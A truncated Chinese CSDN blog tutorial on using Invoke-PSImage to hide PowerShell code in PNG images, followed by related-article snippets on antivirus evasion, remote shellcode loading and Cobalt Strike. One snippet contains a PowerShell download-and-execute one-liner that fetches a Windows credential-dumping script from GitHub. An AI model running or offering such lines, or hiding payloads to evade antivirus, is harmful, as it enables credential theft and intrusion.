Invoke-PSImage-master对图片代码隐写

最新推荐文章于 2024-08-16 09:52:01 发布
最新推荐文章于 2024-08-16 09:52:01 发布
阅读量654 收藏 3
点赞数
文章标签: 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Tonylytdv/article/details/119980753
版权
本文介绍了如何使用Invoke-PSImage项目将恶意代码隐藏在图片中,详细阐述了检测执行策略和隐写过程。首先,从GitHub下载Invoke-PSImage,然后在PowerShell环境下检查执行策略。如果策略受限,需要调整。接着,说明了如何进行代码和图片的准备,以及隐写成功的标志。最后,用户只需复制生成的sal开头的代码在PowerShell执行,即可完成隐写代码的激活。
摘要由CSDN通过智能技术生成

今天逛帖子偶然看见用图片可以隐藏恶意代码的方法,于是展开了研究。
先从github上下载了项目
Invoke-PSImage
使用方法如下,打开powershell(打开cmd是没有用的)
进入到Invoke-PSImage文件夹目录
在这里插入图片描述

一、检测执行策略是否支持

先使用下面的命令测试,当前powershell是否支持使用脚本

Get-ExecutionPolicy

在这里插入图片描述
如果出现如图情况,是可以使用的
如果出现Restricted需要重新设置执行策略

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

二、开始隐写

首先要准备代码和图片,在测试中,图片存放在image下1.png
代码必须使用.ps1格式

Import-Module .\Invoke-PSimage.ps1
Invok
最低0.47元/天 解锁文章
zeratul_l
关注
使用PowerShell的Invoke-SqlCmd
culuo4781的博客
07-26 1981
PowerShell features many one-line commands for working with SQL Server, one of which is Invoke-SqlCmd. This tool can be useful in many development contexts where we need to quickly execute script...
利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55
AerYinan的博客
01-12 9715
利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55
Invoke-PSImage
04-25
调用PSImage 将PowerShell脚本编码为PNG文件的像素,并生成一个oneliner以执行 Invoke-PSImage使用PowerShell脚本并将该脚本的字节编码为PNG图像的像素。 它从Web的文件中生成一个oneliner来执行。 它可以仅使用有效载荷数据来创建新图像,也可以将有效载荷嵌入现有图像的最低有效字节中,从而看起来像真实的图片。 图像保存为PNG,并且可以无损压缩,而不会影响执行有效载荷的能力,因为数据本身以颜色存储。 创建新图像时,通常会对常规PowerShell脚本进行显着压缩,通常会生成png,其文件大小约为原始脚本的50%。 使用embed方法时,每个像素中2个颜色值的最低有效4位用于保存有效负载。 结果会影响图像质量,但看起来仍然不错。 它可以接受大多数图像类型作为输入,但是输出始终是PNG,因为它需要无损。 图像的每个像素都用于保存脚本的一
Invoke-PSImage使用教程
gitblog_00232的博客
08-10 300
Invoke-PSImage使用教程 Invoke-PSImageEncodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute项目地址:https://gitcode.com/gh_mirrors/in/Invoke-PSImage 项目介绍 Invoke-PSImage ...
探索安全边界:Invoke-PSImage - 可执行PNG的隐藏力量
gitblog_00075的博客
05-12 439
探索安全边界:Invoke-PSImage - 可执行PNG的隐藏力量 Invoke-PSImageEncodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute项目地址:https://gitcode.com/gh_mirrors/in/Invoke-PSImage 在网络安...
invoke-PSImage.ps1源码解读
sojrs_sec的博客
12-23 677
[CmdletBinding()] Param ( [Parameter(Position = 0, Mandatory = $True)] [String] $Script, [Parameter(Position = 1, Mandatory = $True)] [String] $Out, ...
Jsteg隐写代码
09-27
图像隐写的一种方法,matlab代码实现。
三点法隐写代码
11-11
信息影藏的三点法隐写代码,来自武汉大学实验室的实验书。
php代码隐写图片,BlackRose: 1-VulnHub
weixin_39685697的博客
03-19 423
0x01 下载下载地址:https://www.vulnhub.com/entry/blackrose-1,509/由于国外访问较慢,这里下载后的文件已经传到了网盘网盘链接:https://pan.baidu.com/s/1FGc7RPXnerkcydqN9i86Gw提取码:5whzPS:下载vulnhub里面的镜像可以使用FDM这款工具,挂到机器上慢慢下。0x02 安装这里推荐直接使用virtu...
Invoke-PSImage免杀过360杀毒
weixin_50217210的博客
03-05 433
它会利用图片中的每个像素点最后4位有效位的2个颜色值来储存Payload数据,虽然图片的质量会受到影响,但是一般来说是看不到太大区别。图片需要存储为PNG格式,由于payload数据存储在颜色值中,因此这种格式进行无损压缩并且不会影响到payload的执行,它可以接受目前绝大多数类型的图片类型进行输入,但输出必须是PNG格式,因此输出的图片数据需要是无损的。图片的每一个像素都需要存储脚本的一个字节,所以你需要根据脚本中的字节数据大小来选择图片(尽可能多的像素点)。应该是图片选择的不合适,
Invoke-WCMDump-master1.rar
06-10
使用 Invoke-WCMDump 加powershell 获取windows凭证密码 使用文档地址:https://blog.csdn.net/caperxi/article/details/117775522
Invoke-WCMDump结合powershell进行密码获取
03-26
Ivoke-WCMDump 什么是Credential Manager...powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1');Invoke-WCMDump
信息隐写术基础代码
02-05
相关文章可以在CSDN IT1995博客找到代码配套教程。
SimpleShellcode:利用图片隐写术来远程动态加载shellcode
05-27
0x01 前言 将Shellcode隐写到正常BMP图片中,把字符串拆成字节,写入每个像素的alpha通道中,然后上传到可信任的网站下偏移拼接shellcode进行远程动态加载,能有效地增加了免杀性和隐匿性。 0x02 参考链接
图片隐藏恶意代码绕过杀软之PSImage
sojrs_sec的博客
12-24 2619
前言 随着现在杀毒软件的不断更新和升级,如何才能把恶意代码上传到攻击者的服务器而不被杀毒软件所查杀,恐怕是黑产相关人员永远绕不过的话题。最近看到一则消息,有一款挖矿病毒【MyKingz】为了隐藏自身的恶意代码,将代码隐藏在taylor swift的图像中,以实现免杀的效果。接下来我将以实例演示,看看恶意代码是如何隐藏在图片中并进行调用的 恶意代码隐藏实例及演示 环境 windows server ...
图片免杀过杀软
内心不种满鲜花就会长满杂草
05-27 1353
​继上一篇免杀—msf shellcode分离免杀,这篇利用隐写术将 Shellcode 隐写入 PNG 图片 RGB 像素中,从而隐藏后门代码,并进行远程加载控制目标主机。
图片隐写——小苹果wp
weixin_44300286的博客
07-09 629
前言:今天做了一道非常绕的图片隐写题,不过通过这道题也收集到了一波工具,涨了不少姿势。 题目的名称是小苹果,然后就只有一张中国结的图片apple.png 直觉告诉我要扫这张二维码,扫完码内容如下: \u7f8a\u7531\u5927\u4e95\u592b\u5927\u4eba\u738b\u4e2d\u5de5 乍一看,这是什么东西! 然后去百度了一波才知道,这原来是Unicode编码。 ...
图像隐写加载payload
最新发布
无问社区的博客
08-16 314
‌图像隐写是一种将信息隐藏在图像中的技术,根据隐藏信息对图像处理和潜在干扰的抵抗能力,隐写技术可以分为‌鲁棒隐写和‌脆弱隐写两类。 鲁棒隐写能够抵抗各种图像处理和潜在干扰,适用于需要在图像传输或存储过程中保持信息完整性的场合,如‌版权标记或身份验证。脆弱隐写对图像处理和干扰非常敏感,通常用于图像完整性验证和篡改检测。此外,根据是否可以恢复出原始图像,图像隐写还可以分为‌可逆隐写和不可逆隐写
【渗透测试】CS4.0的使用(四)
SunnyCat
10-13 1312
目录【渗透测试】CS4.0的使用(四)一、试验环境二、实验步骤1、kali端本地启动cs4.32、创建监听3、使用cs生成一个powershell的payload4、使用Invoke-PSImage生成shell图片5、将生成的图片上传到自己的服务器上6、在目标机器上执行攻击代码,cs上线三、流量分析 【渗透测试】CS4.0的使用(四) 一、试验环境 kali:10.95.16.113 windows10:10.95.16.112 (无防护) 工具:Invoke-PSImage https://github
利用Invoke-WCMDump主控Windows密码凭证
资源摘要信息:"Invoke-WCMDump-master1.rar" 知识点详细说明: 1. Invoke-WCMDump 工具介绍: Invoke-WCMDump 是一款 PowerShell 脚本工具,主要用于提取 Windows 系统中存储的凭证密码。该工具能够访问 Windows ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值